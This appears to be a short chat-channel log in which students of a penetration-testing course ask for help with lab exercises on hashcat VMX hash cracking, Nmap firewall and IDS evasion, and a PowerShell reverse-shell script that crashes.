cloud urchin
#

you can dm me

split portal
#

thanks!

nocturne trench
#

somebody understands the VMX hash cracking task, in hashcat module? it says that the final password comes in format Inlane_, and is at least 10 chars, so I dont get if the string Inlane is a prefix or it means that the password is capitalized and has a special char as a suffix

hushed furnace
#

Module: Network Enumeration with Nmap
Section: Firewall and IDS/IPS Evasion - Hard Lab

Can someone help me here? I have nearly tried everything, I found out another port except those 2 but still idk what I am missing. I know source port is my friend but still.

fathom pendant
hushed furnace
fathom pendant
woeful topaz
#

Heyy, I am having a problem while going through reverse shell

hushed furnace
woeful topaz
#

powershell is getting crash wheneer I am puting my revshell script in powershell